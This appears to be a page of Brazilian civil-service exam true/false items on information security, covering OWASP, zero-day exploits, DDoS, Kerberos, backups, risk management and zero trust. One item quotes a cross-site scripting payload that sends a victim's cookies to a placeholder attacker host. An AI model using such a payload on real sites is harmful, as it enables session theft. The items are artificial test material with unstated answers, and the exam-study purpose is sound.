Questões de Concurso Comentadas sobre segurança da informação
Foram encontradas 13.345 questões
O guia de testes do OWASP enumera verificações para cerca de setenta vulnerabilidades, agrupadas em classes, como a de gerenciamento de sessões, que trata de erros na implementação das regras de negócio.
Antes de iniciar o teste de invasão, deve-se ter um contrato assinado entre as partes envolvidas, para definir o escopo da atividade, os tipos de testes a serem realizados e a autorização para sua execução.
Acerca de ataques do dia zero (zero day attacks), julgue o item que se seguem.
As melhores práticas estabelecem que, para combater a
disseminação de zero days, as organizações podem publicar
um processo de vulnerabilidades, mantendo relatórios de
segurança e triagem dos problemas reportados internamente.
Acerca de ataques do dia zero (zero day attacks), julgue o item que se seguem.
Em um mundo digital, exploits zero-day são amplamente
encontrados, sendo desnecessário conhecimento técnico
elaborado para os hackers descobrirem novas brechas,
porque a maioria dos usuários não atualiza seus
equipamentos com frequência.
Acerca de ataques do dia zero (zero day attacks), julgue o item que se seguem.
Exploits zero-day atacam brechas que ainda são
desconhecidas pelos fabricantes de software e pelos
fornecedores de antivírus; não existem nem assinaturas de
antivírus para detectar tal exploit nem atualizações
disponíveis para reparar as brechas.
Acerca de ataques a roteadores e switches, julgue o item subsequente.
Em um ataque ao STP (Spanning Tree Protocol), o atacante
transmite um BPDU (bridge protocol data unit) de alteração
de configuração ou de topologia de STP.
Acerca das características de ataques de negação de serviço distribuído (DDoS), julgue o item a seguir.
Um ataque DDoS que utiliza protocolo DNS caracteriza-se
por usar servidores de nomes para transformar consultas
pequenas em cargas úteis muito maiores na resposta
redirecionada à vítima.
A mitigação de ataques DDoS é trivial se existir um web application firewall na frente da aplicação atacada.
No que se refere a técnicas de backup de dados, julgue o item seguinte.
Um sistema de backup diferencial permite o salvamento
apenas dos dados que tiverem sido alterados desde o último
backup completo.
No que se refere a técnicas de backup de dados, julgue o item seguinte.
Um sistema de backup incremental é capaz de armazenar os
dados alterados desde um ponto de referência no tempo.
No Kerberos, o tíquete de concessão (TGT) possui carimbo de hora, mas é enviado em texto claro.
No passo básico de autenticação do Kerberos, o cliente se autentica no servidor de autenticação, que, por sua vez, encaminha o nome de usuário para um centro de distribuição de chaves.
Julgue o próximo item, a respeito de gerência de riscos.
Risco é o efeito da incerteza nos objetivos, sendo
normalmente expresso em termos de fontes de risco, eventos
potenciais, suas consequências e suas probabilidades.
Julgue o próximo item, a respeito de gerência de riscos.
Para gerenciar riscos, devem-se considerar os contextos
externo e interno da organização, salvo o comportamento
humano.
O modelo confiança zero estabelece que, depois de um usuário ser autenticado, devem-se fornecer a ele todos os acessos.
Uma rede de confiança zero pressupõe que haja invasores dentro e fora da rede, por isso nenhum usuário ou máquina deve ser automaticamente confiável.
O referido decreto estabelece que qualquer auditoria de segurança da informação deve ser autorizada pelo gestor de tecnologia da informação do órgão.
Cabe aos órgãos e às entidades da administração pública federal, em seu âmbito de atuação, analisar os resultados dos trabalhos de auditoria sobre a gestão de segurança da informação.
É correto firmar que, a seguir, é ilustrado o conteúdo típico de um arquivo de log de um serviço de email, obtido por meio do comando more /var/log/maillog.
Aug 10 14:14:01 localhost sendmail[4768]: h7ALE1t04 763: [email protected], ctladdr=apache (48/48 ), delay=00:00:00, xdelay=00:00:00, mailer=esmtp, p ri=31300, relay=mx1.mail.yahoo.com. [64.157.4.78], d sn=2.0.0, stat=Sent (ok dirdel)
Considere, ainda, que um atacante tenha alterado o parâmetro CC no browser pelo código a seguir.
><script>document.location=
'http://www.attacker.com/cgi-bin/cookie.cgi?
foo='+document.cookie</script>
Nesse caso, o risco de segurança da aplicação é a desserialização insegura.
Muitas aplicações web e APIs não protegem de forma
adequada dados sensíveis, como dados financeiros, de saúde
ou de identificação pessoal, por isso, para sua proteção, é
necessário classificar os dados processados, armazenados ou
transmitidos pela aplicação.